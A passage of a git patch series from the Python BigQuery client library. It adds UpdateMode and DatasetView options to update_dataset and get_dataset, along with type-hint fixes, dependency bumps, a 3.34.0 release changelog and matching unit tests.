client._call_api.return_value = { "jobReference": { "projectId": "response-project", @@ -768,6 +767,7 @@ def test_query_and_wait_caches_completed_query_results_one_page(): def test_query_and_wait_caches_completed_query_results_one_page_no_rows(): client = mock.create_autospec(Client) + client.default_job_creation_mode = None client._call_api.return_value = { "jobReference": { "projectId": "response-project", diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 468068321..8ce8d2cbd 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -213,6 +213,17 @@ def test_ctor_w_client_options_universe(self): ) self.assertEqual(client._connection.API_BASE_URL, "https://bigquery.foo.com") + def test_ctor_w_job_creation_mode(self): + creds = _make_credentials() + http = object() + client = self._make_one( + project=self.PROJECT, + credentials=creds, + _http=http, + default_job_creation_mode="foo", + ) + self.assertEqual(client.default_job_creation_mode, "foo") + def test_ctor_w_location(self): from google.cloud.bigquery._http import Connection From cfbf263947e4acb3a866dae96e622c67fc0c6ec3 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 27 May 2025 20:46:02 +0200 Subject: [PATCH 120/202] chore(deps): update dependency pytest-xdist to v3.7.0 (#2203) Co-authored-by: Chalmer Lowe Co-authored-by: Lingqing Gan --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/magics/requirements-test.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/snippets/requirements-test.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index cc71ee426..2ad35b418 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 7b01ce8ac..3ca365401 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index cc71ee426..2ad35b418 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index cc71ee426..2ad35b418 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 503324cb0..767f71fb1 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -2,4 +2,4 @@ google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 From d92b487c29e8d27a2f04e3b15eec14e8c3d109f0 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 27 May 2025 13:34:28 -0700 Subject: [PATCH 121/202] chore(main): release 3.34.0 (#2193) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> Co-authored-by: shollyman --- CHANGELOG.md | 18 ++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 19 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 2f7166d44..3b29a6a41 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,24 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.34.0](https://github.com/googleapis/python-bigquery/compare/v3.33.0...v3.34.0) (2025-05-27) + + +### Features + +* Job creation mode GA ([#2190](https://github.com/googleapis/python-bigquery/issues/2190)) ([64cd39f](https://github.com/googleapis/python-bigquery/commit/64cd39fb395c4a03ef6d2ec8261e1709477b2186)) + + +### Bug Fixes + +* **deps:** Update all dependencies ([#2184](https://github.com/googleapis/python-bigquery/issues/2184)) ([12490f2](https://github.com/googleapis/python-bigquery/commit/12490f2f03681516465fc34217dcdf57000f6fdd)) + + +### Documentation + +* Update query.py ([#2192](https://github.com/googleapis/python-bigquery/issues/2192)) ([9b5ee78](https://github.com/googleapis/python-bigquery/commit/9b5ee78f046d9ca3f758eeca6244b8485fe35875)) +* Use query_and_wait in the array parameters sample ([#2202](https://github.com/googleapis/python-bigquery/issues/2202)) ([28a9994](https://github.com/googleapis/python-bigquery/commit/28a9994792ec90a6a4d16835faf2137c09c0fb02)) + ## [3.33.0](https://github.com/googleapis/python-bigquery/compare/v3.32.0...v3.33.0) (2025-05-19) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 8304ac025..9e1393854 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.33.0" +__version__ = "3.34.0" From de33204bd67bc897c3a19b709becd0b9473bd907 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 30 May 2025 11:16:38 +0200 Subject: [PATCH 122/202] chore(deps): update all dependencies (#2205) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 4 ++-- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements.txt | 4 ++-- samples/snippets/requirements.txt | 2 +- 5 files changed, 8 insertions(+), 8 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 4a5b75346..a512dbd3a 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.33.0 +google-cloud-bigquery==3.34.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 7a0946fae..049e88237 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -12,8 +12,8 @@ geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 google-auth==2.40.2 -google-cloud-bigquery==3.33.0 -google-cloud-bigquery-storage==2.31.0 +google-cloud-bigquery==3.34.0 +google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 7d0c91e3d..960eb6db4 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.0 db-dtypes==1.4.3 -google.cloud.bigquery==3.33.0 -google-cloud-bigquery-storage==2.31.0 +google.cloud.bigquery==3.34.0 +google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 9f131e5b8..27eb7459a 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,7 +1,7 @@ bigquery-magics==0.10.0 db-dtypes==1.4.3 -google-cloud-bigquery==3.33.0 -google-cloud-bigquery-storage==2.31.0 +google-cloud-bigquery==3.34.0 +google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' ipython==9.2.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index dae43eff3..fd8bd672b 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.33.0 +google-cloud-bigquery==3.34.0 From b86329188ba35e61871db82ae1d95d2a576eed1b Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 30 May 2025 12:36:07 -0400 Subject: [PATCH 123/202] Fix: Update type hints for various BigQuery files (#2206) * Fix: Update type hints for various BigQuery files This commit addresses Issue #2132 by updating type hints in the following files: - google/cloud/bigquery/external_config.py - google/cloud/bigquery/job/base.py - google/cloud/bigquery/routine/routine.py - google/cloud/bigquery/schema.py - google/cloud/bigquery/table.py These changes improve code clarity and maintainability by providing more accurate type information. * updates type hints across the board --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/external_config.py | 9 +++++---- google/cloud/bigquery/job/base.py | 4 +--- google/cloud/bigquery/routine/routine.py | 12 +++--------- google/cloud/bigquery/schema.py | 6 ++---- google/cloud/bigquery/table.py | 11 ++++++----- 5 files changed, 17 insertions(+), 25 deletions(-) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 6e943adf3..cb8141cd0 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -22,6 +22,7 @@ import base64 import copy +import typing from typing import Any, Dict, FrozenSet, Iterable, Optional, Union from google.cloud.bigquery._helpers import _to_bytes @@ -835,10 +836,10 @@ def schema(self): See https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.schema """ - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - prop = self._properties.get("schema", {}) # type: ignore - return [SchemaField.from_api_repr(field) for field in prop.get("fields", [])] # type: ignore + prop: Dict[str, Any] = typing.cast( + Dict[str, Any], self._properties.get("schema", {}) + ) + return [SchemaField.from_api_repr(field) for field in prop.get("fields", [])] @schema.setter def schema(self, value): diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index 5eb700ce7..f007b9341 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -435,9 +435,7 @@ def __init__(self, job_id, client): @property def configuration(self) -> _JobConfig: """Job-type specific configurtion.""" - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - configuration = self._CONFIG_CLASS() # pytype: disable=not-callable + configuration: _JobConfig = self._CONFIG_CLASS() # pytype: disable=not-callable configuration._properties = self._properties.setdefault("configuration", {}) return configuration diff --git a/google/cloud/bigquery/routine/routine.py b/google/cloud/bigquery/routine/routine.py index 7e079781d..e933fa137 100644 --- a/google/cloud/bigquery/routine/routine.py +++ b/google/cloud/bigquery/routine/routine.py @@ -518,23 +518,17 @@ def __init__(self): @property def project(self): """str: ID of the project containing the routine.""" - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - return self._properties["projectId"] # pytype: disable=typed-dict-error + return self._properties.get("projectId", "") @property def dataset_id(self): """str: ID of dataset containing the routine.""" - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - return self._properties["datasetId"] # pytype: disable=typed-dict-error + return self._properties.get("datasetId", "") @property def routine_id(self): """str: The routine ID.""" - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - return self._properties["routineId"] # pytype: disable=typed-dict-error + return self._properties.get("routineId", "") @property def path(self): diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 1f1aab7a4..456730b00 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -232,11 +232,9 @@ def __init__( if max_length is not _DEFAULT_VALUE: self._properties["maxLength"] = max_length if policy_tags is not _DEFAULT_VALUE: - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 self._properties["policyTags"] = ( - policy_tags.to_api_repr() # pytype: disable=attribute-error - if policy_tags is not None + policy_tags.to_api_repr() + if isinstance(policy_tags, PolicyTagList) else None ) if isinstance(range_element_type, str): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 3b1334bd3..3ffd5ca56 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -137,9 +137,9 @@ def _reference_getter(table): return TableReference(dataset_ref, table.table_id) -# TODO: The typehinting for this needs work. Setting this pragma to temporarily -# manage a pytype issue that came up in another PR. See Issue: #2132 -def _view_use_legacy_sql_getter(table): +def _view_use_legacy_sql_getter( + table: Union["Table", "TableListItem"] +) -> Optional[bool]: """bool: Specifies whether to execute the view with Legacy or Standard SQL. This boolean specifies whether to execute the view with Legacy SQL @@ -151,15 +151,16 @@ def _view_use_legacy_sql_getter(table): ValueError: For invalid value types. """ - view = table._properties.get("view") # type: ignore + view: Optional[Dict[str, Any]] = table._properties.get("view") if view is not None: # The server-side default for useLegacySql is True. - return view.get("useLegacySql", True) # type: ignore + return view.get("useLegacySql", True) if view is not None else True # In some cases, such as in a table list no view object is present, but the # resource still represents a view. Use the type as a fallback. if table.table_type == "VIEW": # The server-side default for useLegacySql is True. return True + return None # explicit return statement to appease mypy class _TableBase: From eb9c2aff242c5107f968bbd8b6a9d30cecc877f6 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 30 May 2025 17:58:02 -0400 Subject: [PATCH 124/202] feat: Add UpdateMode to update_dataset (#2204) * feat: Add UpdateMode to update_dataset This commit introduces the `UpdateMode` enum and integrates it into the `update_dataset` method in the BigQuery client. The `UpdateMode` enum allows you to specify which parts of a dataset should be updated (metadata, ACL, or full update). The following changes were made: - Defined the `UpdateMode` enum in `google/cloud/bigquery/enums.py` with values: `UPDATE_MODE_UNSPECIFIED`, `UPDATE_METADATA`, `UPDATE_ACL`, and `UPDATE_FULL`. - Modified the `update_dataset` method in `google/cloud/bigquery/client.py` to accept an optional `update_mode` parameter. This parameter is added to the query parameters if provided. - Added unit tests in `tests/unit/test_client.py` to verify the correct handling of the `update_mode` parameter, including testing all enum values and the default case where it's not provided. * updates enums, client, and tests --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/client.py | 22 ++++++++ google/cloud/bigquery/enums.py | 18 +++++++ tests/unit/test_client.py | 93 ++++++++++++++++++++++++++++++++- 3 files changed, 132 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index c6873545b..cc3b3eb2a 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -91,6 +91,7 @@ from google.cloud.bigquery.dataset import DatasetListItem from google.cloud.bigquery.dataset import DatasetReference from google.cloud.bigquery.enums import AutoRowIDs +from google.cloud.bigquery.enums import UpdateMode from google.cloud.bigquery.format_options import ParquetOptions from google.cloud.bigquery.job import ( CopyJob, @@ -1198,6 +1199,7 @@ def update_dataset( fields: Sequence[str], retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, + update_mode: Optional[UpdateMode] = None, ) -> Dataset: """Change some fields of a dataset. @@ -1237,6 +1239,20 @@ def update_dataset( timeout (Optional[float]): The number of seconds to wait for the underlying HTTP transport before using ``retry``. + update_mode (Optional[google.cloud.bigquery.enums.UpdateMode]): + Specifies the kind of information to update in a dataset. + By default, dataset metadata (e.g. friendlyName, description, + labels, etc) and ACL information are updated. This argument can + take on the following possible enum values. + + * :attr:`~google.cloud.bigquery.enums.UPDATE_MODE_UNSPECIFIED`: + The default value. Behavior defaults to UPDATE_FULL. + * :attr:`~google.cloud.bigquery.enums.UpdateMode.UPDATE_METADATA`: + Includes metadata information for the dataset, such as friendlyName, description, labels, etc. + * :attr:`~google.cloud.bigquery.enums.UpdateMode.UPDATE_ACL`: + Includes ACL information for the dataset, which defines dataset access for one or more entities. + * :attr:`~google.cloud.bigquery.enums.UpdateMode.UPDATE_FULL`: + Includes both dataset metadata and ACL information. Returns: google.cloud.bigquery.dataset.Dataset: @@ -1250,6 +1266,11 @@ def update_dataset( path = dataset.path span_attributes = {"path": path, "fields": fields} + if update_mode: + query_params = {"updateMode": update_mode.value} + else: + query_params = {} + api_response = self._call_api( retry, span_name="BigQuery.updateDataset", @@ -1259,6 +1280,7 @@ def update_dataset( data=partial, headers=headers, timeout=timeout, + query_params=query_params, ) return Dataset.from_api_repr(api_response) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 4cb7a056d..e9cd911d0 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -409,6 +409,24 @@ class BigLakeTableFormat(object): """Apache Iceberg format.""" +class UpdateMode(enum.Enum): + """Specifies the kind of information to update in a dataset.""" + + UPDATE_MODE_UNSPECIFIED = "UPDATE_MODE_UNSPECIFIED" + """The default value. Behavior defaults to UPDATE_FULL.""" + + UPDATE_METADATA = "UPDATE_METADATA" + """Includes metadata information for the dataset, such as friendlyName, + description, labels, etc.""" + + UPDATE_ACL = "UPDATE_ACL" + """Includes ACL information for the dataset, which defines dataset access + for one or more entities.""" + + UPDATE_FULL = "UPDATE_FULL" + """Includes both dataset metadata and ACL information.""" + + class JobCreationMode(object): """Documented values for Job Creation Mode.""" diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 8ce8d2cbd..ed092bcdb 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -60,7 +60,8 @@ from google.cloud.bigquery import job as bqjob import google.cloud.bigquery._job_helpers -from google.cloud.bigquery.dataset import DatasetReference +from google.cloud.bigquery.dataset import DatasetReference, Dataset +from google.cloud.bigquery.enums import UpdateMode from google.cloud.bigquery import exceptions from google.cloud.bigquery import ParquetOptions import google.cloud.bigquery.retry @@ -2101,6 +2102,7 @@ def test_update_dataset(self): }, path="/" + PATH, timeout=7.5, + query_params={}, ) self.assertEqual(ds2.description, ds.description) self.assertEqual(ds2.friendly_name, ds.friendly_name) @@ -2114,6 +2116,94 @@ def test_update_dataset(self): client.update_dataset(ds, []) req = conn.api_request.call_args self.assertEqual(req[1]["headers"]["If-Match"], "etag") + self.assertEqual(req[1].get("query_params"), {}) + + def test_update_dataset_w_update_mode(self): + PATH = f"projects/{self.PROJECT}/datasets/{self.DS_ID}" + creds = _make_credentials() + client = self._make_one(project=self.PROJECT, credentials=creds) + + DESCRIPTION = "DESCRIPTION" + RESOURCE = { + "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, + "etag": "etag", + "description": DESCRIPTION, + } + dataset_ref = DatasetReference(self.PROJECT, self.DS_ID) + orig_dataset = Dataset(dataset_ref) + orig_dataset.description = DESCRIPTION + filter_fields = ["description"] + + test_cases = [ + (None, None), + (UpdateMode.UPDATE_MODE_UNSPECIFIED, "UPDATE_MODE_UNSPECIFIED"), + (UpdateMode.UPDATE_METADATA, "UPDATE_METADATA"), + (UpdateMode.UPDATE_ACL, "UPDATE_ACL"), + (UpdateMode.UPDATE_FULL, "UPDATE_FULL"), + ] + + for update_mode_arg, expected_param_value in test_cases: + with self.subTest( + update_mode_arg=update_mode_arg, + expected_param_value=expected_param_value, + ): + conn = client._connection = make_connection(RESOURCE, RESOURCE) + + new_dataset = client.update_dataset( + orig_dataset, + fields=filter_fields, + update_mode=update_mode_arg, + ) + self.assertEqual(orig_dataset.description, new_dataset.description) + + if expected_param_value: + expected_query_params = {"updateMode": expected_param_value} + else: + expected_query_params = {} + + conn.api_request.assert_called_once_with( + method="PATCH", + path="/" + PATH, + data={"description": DESCRIPTION}, + timeout=DEFAULT_TIMEOUT, + query_params=expected_query_params if expected_query_params else {}, + ) + + def test_update_dataset_w_invalid_update_mode(self): + creds = _make_credentials() + client = self._make_one(project=self.PROJECT, credentials=creds) + + DESCRIPTION = "DESCRIPTION" + resource = { + "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, + "etag": "etag", + } + + dataset_ref = DatasetReference(self.PROJECT, self.DS_ID) + orig_dataset = Dataset(dataset_ref) + orig_dataset.description = DESCRIPTION + filter_fields = ["description"] # A non-empty list of fields is required + + # Mock the connection to prevent actual API calls + # and to provide a minimal valid response if the call were to proceed. + conn = client._connection = make_connection(resource) + + test_cases = [ + "INVALID_STRING", + 123, + 123.45, + object(), + ] + + for invalid_update_mode in test_cases: + with self.subTest(invalid_update_mode=invalid_update_mode): + conn.api_request.reset_mock() # Reset mock for each sub-test + with self.assertRaises(AttributeError): + client.update_dataset( + orig_dataset, + fields=filter_fields, + update_mode=invalid_update_mode, + ) def test_update_dataset_w_custom_property(self): # The library should handle sending properties to the API that are not @@ -2145,6 +2235,7 @@ def test_update_dataset_w_custom_property(self): data={"newAlphaProperty": "unreleased property"}, path=path, timeout=DEFAULT_TIMEOUT, + query_params={}, ) self.assertEqual(dataset.dataset_id, self.DS_ID) From 28a5750d455f0381548df6f9b1f7661823837d81 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 2 Jun 2025 05:42:08 -0400 Subject: [PATCH 125/202] feat: Adds dataset_view parameter to get_dataset method (#2198) * feat: Add dataset_view parameter to get_dataset method This commit introduces a new `dataset_view` parameter to the `get_dataset` method in the BigQuery client. This allows you to specify the level of detail (METADATA, ACL, FULL) returned when fetching a dataset. The `DatasetView` enum has been added to `enums.py`. Unit tests have been added to verify: - Correct query parameter (`view`) formation for each enum value. - Correct behavior when `dataset_view` is None. - AttributeError is raised for invalid `dataset_view` types. * test edits, linting, etc. * Fixes docstring * updates docstrings * update parameter name to align with discovery doc * Update google/cloud/bigquery/client.py --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/client.py | 26 +++++++++++- google/cloud/bigquery/enums.py | 18 ++++++++ tests/unit/test_client.py | 70 ++++++++++++++++++++++++++++++- tests/unit/test_create_dataset.py | 7 +++- 4 files changed, 116 insertions(+), 5 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index cc3b3eb2a..bb4d80c73 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -90,8 +90,8 @@ from google.cloud.bigquery.dataset import Dataset from google.cloud.bigquery.dataset import DatasetListItem from google.cloud.bigquery.dataset import DatasetReference -from google.cloud.bigquery.enums import AutoRowIDs -from google.cloud.bigquery.enums import UpdateMode + +from google.cloud.bigquery.enums import AutoRowIDs, DatasetView, UpdateMode from google.cloud.bigquery.format_options import ParquetOptions from google.cloud.bigquery.job import ( CopyJob, @@ -865,6 +865,7 @@ def get_dataset( dataset_ref: Union[DatasetReference, str], retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, + dataset_view: Optional[DatasetView] = None, ) -> Dataset: """Fetch the dataset referenced by ``dataset_ref`` @@ -882,7 +883,21 @@ def get_dataset( timeout (Optional[float]): The number of seconds to wait for the underlying HTTP transport before using ``retry``. + dataset_view (Optional[google.cloud.bigquery.enums.DatasetView]): + Specifies the view that determines which dataset information is + returned. By default, dataset metadata (e.g. friendlyName, description, + labels, etc) and ACL information are returned. This argument can + take on the following possible enum values. + * :attr:`~google.cloud.bigquery.enums.DatasetView.ACL`: + Includes dataset metadata and the ACL. + * :attr:`~google.cloud.bigquery.enums.DatasetView.FULL`: + Includes all dataset metadata, including the ACL and table metadata. + This view is not supported by the `datasets.list` API method. + * :attr:`~google.cloud.bigquery.enums.DatasetView.METADATA`: + Includes basic dataset metadata, but not the ACL. + * :attr:`~google.cloud.bigquery.enums.DatasetView.DATASET_VIEW_UNSPECIFIED`: + The server will decide which view to use. Currently defaults to FULL. Returns: google.cloud.bigquery.dataset.Dataset: A ``Dataset`` instance. @@ -892,6 +907,12 @@ def get_dataset( dataset_ref, default_project=self.project ) path = dataset_ref.path + + if dataset_view: + query_params = {"datasetView": dataset_view.value} + else: + query_params = {} + span_attributes = {"path": path} api_response = self._call_api( retry, @@ -900,6 +921,7 @@ def get_dataset( method="GET", path=path, timeout=timeout, + query_params=query_params, ) return Dataset.from_api_repr(api_response) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index e9cd911d0..9a1e4880c 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -80,6 +80,24 @@ class CreateDisposition(object): returned in the job result.""" +class DatasetView(enum.Enum): + """DatasetView specifies which dataset information is returned.""" + + DATASET_VIEW_UNSPECIFIED = "DATASET_VIEW_UNSPECIFIED" + """The default value. Currently maps to the FULL view.""" + + METADATA = "METADATA" + """View metadata information for the dataset, such as friendlyName, + description, labels, etc.""" + + ACL = "ACL" + """View ACL information for the dataset, which defines dataset access + for one or more entities.""" + + FULL = "FULL" + """View both dataset metadata and ACL information.""" + + class DefaultPandasDTypes(enum.Enum): """Default Pandas DataFrem DTypes to convert BigQuery data. These Sentinel values are used instead of None to maintain backward compatibility, diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index ed092bcdb..42bfc84b9 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -61,7 +61,7 @@ from google.cloud.bigquery import job as bqjob import google.cloud.bigquery._job_helpers from google.cloud.bigquery.dataset import DatasetReference, Dataset -from google.cloud.bigquery.enums import UpdateMode +from google.cloud.bigquery.enums import UpdateMode, DatasetView from google.cloud.bigquery import exceptions from google.cloud.bigquery import ParquetOptions import google.cloud.bigquery.retry @@ -753,7 +753,7 @@ def test_get_dataset(self): final_attributes.assert_called_once_with({"path": "/%s" % path}, client, None) conn.api_request.assert_called_once_with( - method="GET", path="/%s" % path, timeout=7.5 + method="GET", path="/%s" % path, timeout=7.5, query_params={} ) self.assertEqual(dataset.dataset_id, self.DS_ID) @@ -819,6 +819,72 @@ def test_get_dataset(self): self.assertEqual(dataset.dataset_id, self.DS_ID) + def test_get_dataset_with_dataset_view(self): + path = "projects/%s/datasets/%s" % (self.PROJECT, self.DS_ID) + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + resource = { + "id": "%s:%s" % (self.PROJECT, self.DS_ID), + "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, + } + dataset_ref = DatasetReference(self.PROJECT, self.DS_ID) + + test_cases = [ + (None, None), + (DatasetView.DATASET_VIEW_UNSPECIFIED, "DATASET_VIEW_UNSPECIFIED"), + (DatasetView.METADATA, "METADATA"), + (DatasetView.ACL, "ACL"), + (DatasetView.FULL, "FULL"), + ] + + for dataset_view_arg, expected_param_value in test_cases: + with self.subTest( + dataset_view_arg=dataset_view_arg, + expected_param_value=expected_param_value, + ): + # Re-initialize the connection mock for each sub-test to reset side_effect + conn = client._connection = make_connection(resource) + + dataset = client.get_dataset(dataset_ref, dataset_view=dataset_view_arg) + + self.assertEqual(dataset.dataset_id, self.DS_ID) + + if expected_param_value: + expected_query_params = {"datasetView": expected_param_value} + else: + expected_query_params = {} + + conn.api_request.assert_called_once_with( + method="GET", + path="/%s" % path, + timeout=DEFAULT_TIMEOUT, + query_params=expected_query_params if expected_query_params else {}, + ) + + def test_get_dataset_with_invalid_dataset_view(self): + invalid_view_values = [ + "INVALID_STRING", + 123, + 123.45, + object(), + ] + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + resource = { + "id": "%s:%s" % (self.PROJECT, self.DS_ID), + "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, + } + conn = client._connection = make_connection(resource) + dataset_ref = DatasetReference(self.PROJECT, self.DS_ID) + + for invalid_view_value in invalid_view_values: + with self.subTest(invalid_view_value=invalid_view_value): + conn.api_request.reset_mock() # Reset mock for each sub-test + with self.assertRaises(AttributeError): + client.get_dataset(dataset_ref, dataset_view=invalid_view_value) + def test_ensure_bqstorage_client_creating_new_instance(self): bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") diff --git a/tests/unit/test_create_dataset.py b/tests/unit/test_create_dataset.py index bd7c6a8f8..b144471ca 100644 --- a/tests/unit/test_create_dataset.py +++ b/tests/unit/test_create_dataset.py @@ -372,7 +372,12 @@ def test_create_dataset_alreadyexists_w_exists_ok_true(PROJECT, DS_ID, LOCATION) }, timeout=DEFAULT_TIMEOUT, ), - mock.call(method="GET", path=get_path, timeout=DEFAULT_TIMEOUT), + mock.call( + method="GET", + path=get_path, + timeout=DEFAULT_TIMEOUT, + query_params={}, + ), ] ) From 0378caa0fdaeec23929b179ca62a7199a8a6098d Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 5 Jun 2025 00:19:15 +0200 Subject: [PATCH 126/202] chore(deps): update all dependencies (#2209) * chore(deps): update all dependencies * pin geopandas===1.0.1 for python <= 3.9 --------- Co-authored-by: Lingqing Gan --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 9 +++++---- samples/magics/requirements-test.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 2 +- samples/snippets/requirements-test.txt | 2 +- 7 files changed, 11 insertions(+), 10 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 2ad35b418..4b9c515a7 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 3ca365401..824a1df4a 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 